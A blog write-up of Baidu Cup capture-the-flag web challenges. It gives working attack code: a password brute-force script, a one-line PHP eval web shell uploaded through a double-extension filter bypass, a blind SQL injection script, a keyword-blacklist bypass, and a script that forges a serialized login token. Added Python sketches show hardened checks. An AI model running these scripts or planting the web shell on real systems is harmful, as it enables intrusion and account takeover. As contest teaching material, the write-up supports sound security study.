Baidu Cup September Web Writeups

123

Python script to brute-force the login username and password

# encoding: utf-8
# Brute-force the login: every username listed in the leaked user.php.bak,
# with passwords of the form <username><year> for the years 1990-1999.
import requests

url = "http://86adc2d12122466badd619509fbcf3731899ba5ef4e34703.changame.ichunqiu.com/login.php"

with open('user.php.bak', encoding='utf-8') as f:
    for line in f:
        s = line.strip()
        if not s:
            continue
        for i in range(1990, 2000):
            data = {
                "username": s,
                "password": s + str(i),
                "submit": "submit",
            }
            rep = requests.post(url=url, data=data)
            print(data)
            # a wrong guess makes the page print "登录失败" (login failed)
            if "登录失败" not in rep.text:
                print(rep.text)
                print("username = " + s)
                print("password = " + s + str(i))
                break

username = zhangyuzhen
password = zhangyuzhen1995

The upload form says the file must have a jpg suffix. Guessing that the whitelist only checks for "jpg" somewhere in the name rather than the real (last) extension, upload shell.jpg.phtml directly; .phtml is still executed as PHP.

File contents: <?=eval($_GET[_]);?>

Visit /view.php?file=flaflagg to get the flag (the filter deletes the substring flag only once, so flaflagg is reduced to flag).
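The double-extension trick above works because the check keys on the presence of "jpg" instead of the real extension. The following Python model is an added example, not code from the challenge: weak_check() reproduces the assumed behaviour of the upload filter, strict_check() whitelists the last extension and rejects names with more than one dot, and stored_name() drops the client-supplied name entirely. ALLOWED_EXT and the function names are assumptions for illustration.

```python
import os
import secrets

# Assumed whitelist of image extensions (illustration only).
ALLOWED_EXT = {"jpg", "jpeg", "png", "gif"}


def weak_check(filename: str) -> bool:
    """Model of the challenge's filter: any name that mentions 'jpg' passes,
    so shell.jpg.phtml is accepted and later executed as PHP."""
    return "jpg" in filename.lower()


def strict_check(filename: str) -> bool:
    """Whitelist the real (last) extension. Names with zero or several dots
    are rejected outright, which defeats double extensions like a.jpg.phtml."""
    base = os.path.basename(filename)      # ignore any path component
    parts = base.split(".")
    if len(parts) != 2 or not parts[0]:
        return False
    return parts[1].lower() in ALLOWED_EXT


def stored_name(filename: str) -> str:
    """Server-chosen name: only the whitelisted extension survives from the
    client's filename, so the attacker never controls the stored path."""
    if not strict_check(filename):
        raise ValueError("extension not allowed")
    ext = filename.rsplit(".", 1)[1].lower()
    return f"{secrets.token_hex(16)}.{ext}"
```

Even with the strict check, store uploads outside the web root or in a directory where script execution is disabled; an extension whitelist alone does not stop a .jpg containing PHP from being included by a separate file-inclusion bug such as the view.php parameter in this challenge.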

SQLI

Commas are filtered, so the comma form substring(x, i, 1) is replaced by substring(x from i for 1). The script is as follows:

import requests

url = "http://f75cd2c0820c4f3a88ff220eaa86d3901024ed0736f34044.changame.ichunqiu.com/l0gin.php"

# Boolean-based blind injection, one character at a time. A true condition
# makes the page contain 'flag'. concat(table_name) is enough here because the
# database has a single table; with several tables use group_concat instead.
str1 = ''
for i in range(1, 20):
    found = False
    for j in range(32, 127):
        id = (f"1' and ascii(substring((select concat(table_name) from information_schema.tables "
              f"where table_schema=database()) from {i} for 1))={j} and '1")
        param = {'id': id}
        rep = requests.get(url=url, params=param)
        #print(rep.url)
        #print(param)
        if 'flag' in rep.text:
            str1 += chr(j)
            print(str1)
            found = True
            break
    if not found:   # no printable character matched: end of the name
        break

SQL

While injecting we find that <> is replaced with the empty string, and that the blacklist keyword check runs on the raw input before the replacement. sel<>ect therefore passes the blacklist and is then turned into select, bypassing it.
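Both the flaflagg trick from the 123 challenge and the sel<>ect trick here exploit the same two mistakes: a single-pass substring removal, and validation that runs before normalisation. The Python model below is an added example (not code from either challenge); the blacklist words and function names are assumptions. check_then_strip() reproduces the vulnerable order, strip_then_check() normalises to a fixpoint first and validates the final string.

```python
from typing import Optional

# Assumed blacklist for illustration.
BLACKLIST = ("select", "union", "from")


def strip_once(s: str, token: str) -> str:
    """Single-pass removal, like one PHP str_replace(): the pieces left on
    either side of the removed token can reassemble into the token again."""
    return s.replace(token, "")


def strip_fully(s: str, token: str) -> str:
    """Repeat the removal until nothing changes, so reassembled copies
    such as flaflagg -> flag cannot survive."""
    while token in s:
        s = s.replace(token, "")
    return s


def contains_blacklisted(s: str) -> bool:
    lowered = s.lower()
    return any(word in lowered for word in BLACKLIST)


def check_then_strip(s: str) -> Optional[str]:
    """Vulnerable order: the blacklist sees 'sel<>ect', which contains no
    keyword, and only afterwards is <> removed, yielding 'select'."""
    if contains_blacklisted(s):
        return None
    return strip_once(s, "<>")


def strip_then_check(s: str) -> Optional[str]:
    """Hardened order: normalise first (to a fixpoint), then validate
    exactly the string that will reach the query."""
    normalised = strip_fully(s, "<>")
    if contains_blacklisted(normalised):
        return None
    return normalised
```

Ordering the filter correctly only closes this particular bypass; the real fix for the SQL side is a parameterised query, after which keyword blacklists become unnecessary.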

LOGIN

array_merge returns NULL when one of its arguments is not an array (PHP 7 and earlier emit a warning; PHP 8 throws a TypeError), and here $_SESSION is null.

Since later arguments of array_merge overwrite the keys of earlier ones, the token is passed as a cookie to override the other sources.

<?php
	include 'common.php';
	$requset = array_merge($_GET, $_POST, $_SESSION, $_COOKIE);
	if(isset($requset['token']))
	{
		$login = unserialize(gzuncompress(base64_decode($requset['token'])));
		$db = new db();
		$row = $db->select('user=\''.mysql_real_escape_string($login['user']).'\'');
		if($login['user'] === 'ichunqiu')
		{
			echo $flag;
		}else if($row['pass'] !== $login['pass']){
			echo 'unserialize injection!!';
		}else{
			echo "(╯‵□′)╯︵┴─┴ ";
		}
	}else{
		header('Location: index.php?error=1');
	}

?>
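The token is unserialize(gzuncompress(base64_decode(...))) of an array with user and pass keys, and the flag branch only requires $login['user'] === 'ichunqiu'. The following Python 3 script, an added example rather than the challenge's own solution, builds such a token by reversing that pipeline: a minimal PHP serialize() for the types the array needs, zlib compression (the same zlib format gzcompress produces) and base64. The value of pass is an arbitrary assumption since the user check fires first.

```python
import base64
import zlib
from urllib.parse import quote


def php_serialize(value) -> bytes:
    """Minimal PHP serialize() covering null, bool, int, str, list and dict.
    String lengths are counted in bytes, exactly as PHP does."""
    if value is None:
        return b"N;"
    if isinstance(value, bool):
        return b"b:1;" if value else b"b:0;"
    if isinstance(value, int):
        return b"i:%d;" % value
    if isinstance(value, str):
        raw = value.encode("utf-8")
        return b's:%d:"%s";' % (len(raw), raw)
    if isinstance(value, (list, tuple)):
        value = dict(enumerate(value))
    if isinstance(value, dict):
        body = b"".join(php_serialize(k) + php_serialize(v) for k, v in value.items())
        return b"a:%d:{%s}" % (len(value), body)
    raise TypeError(f"unsupported type {type(value).__name__}")


def forge_token(user: str, password: str) -> str:
    """Reverse of the server's unserialize(gzuncompress(base64_decode(token)))."""
    payload = php_serialize({"user": user, "pass": password})
    return base64.b64encode(zlib.compress(payload)).decode("ascii")


def decode_token(token: str) -> bytes:
    """What the server sees before unserialize(); used to verify the forgery."""
    return zlib.decompress(base64.b64decode(token))


def cookie_header(token: str) -> str:
    """PHP url-decodes cookie values, so '+' in the base64 would become a
    space; percent-encode the token before putting it in the Cookie header."""
    return "token=" + quote(token, safe="")


if __name__ == "__main__":
    # 'x' as the password is an assumption; the user check is decided first.
    token = forge_token("ichunqiu", "x")
    print(decode_token(token).decode())
    print(cookie_header(token))
```

Send the resulting header with the request to login.php; because $_COOKIE is the last argument of array_merge, the cookie token wins over any token supplied via GET or POST.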

Unless otherwise stated, all articles on this blog are licensed under CC BY-SA 4.0; please credit the source when reposting!